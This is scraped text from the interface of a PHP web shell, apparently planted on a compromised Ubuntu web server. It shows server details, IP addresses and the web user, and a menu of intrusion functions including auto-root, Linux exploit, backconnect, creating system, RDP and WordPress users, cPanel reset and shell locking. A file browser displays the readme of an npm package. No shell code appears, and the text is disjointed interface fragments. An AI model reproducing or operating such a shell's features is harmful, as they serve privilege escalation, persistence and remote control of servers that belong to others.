Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.63.182
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-strict-uri-encode /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.Debian.gz
160
B
-rw-r--r--
copyright
1.44
KB
-rw-r--r--
readme.md
657
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# strict-uri-encode [](https://travis-ci.org/kevva/strict-uri-encode) > A stricter URI encode adhering to [RFC 3986](http://tools.ietf.org/html/rfc3986) ## Install ``` $ npm install --save strict-uri-encode ``` ## Usage ```js const strictUriEncode = require('strict-uri-encode'); strictUriEncode('unicorn!foobar'); //=> 'unicorn%21foobar' strictUriEncode('unicorn*foobar'); //=> 'unicorn%2Afoobar' ``` ## API ### strictUriEncode(string) #### string Type: `string`, `number` String to URI encode. ## License MIT © [Kevin Mårtensson](http://github.com/kevva)
Close